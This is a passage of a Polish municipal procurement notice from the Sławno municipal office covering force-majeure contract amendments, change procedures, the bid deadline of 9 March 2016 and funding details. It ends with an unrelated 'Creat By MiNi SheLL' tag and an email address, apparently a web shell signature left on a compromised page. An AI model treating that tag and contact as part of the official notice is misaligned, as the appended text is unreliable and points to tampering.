        zakresu zamówienia i konieczności zwiększenia umówionego wynagrodzenia;
16) zaistnienia, po zawarciu Umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego 
     warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej,
	o charakterze niezależnym od Stron,
	którego Strony nie mogły przewidzieć przed zawarciem Umowy,
	którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej staranności,
za siłę wyższą, warunkująca zmianę Umowy uważać  się będzie w szczególności:
powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia, które uniemożliwiają wykonanie umowy na warunkach w niej określonych.
 17)jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było 
        przewidzieć w ogłoszeniu o zamówieniu lub SIWZ, mimo zachowania należytej staranności przez 
        Zamawiającego

8. Określa się następujący tryb dokonywania zmian postanowień umowy:
a) zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron wyrażoną
     na piśmie, pod rygorem nieważności,
b) strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do 
     udokumentowania      zaistnienia powyższych okoliczności,
c)  wniosek o zmianę postanowień zawartej umowy musi być wyrażony na  piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> big.ugslawno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
Sławno
pokój Nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2016 godzina 10:00, miejsce: Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
Sławno
pokój Nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający ubiega się o dofinansowanie zadania  
ze środków funduszu rozwoju kultury fizycznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com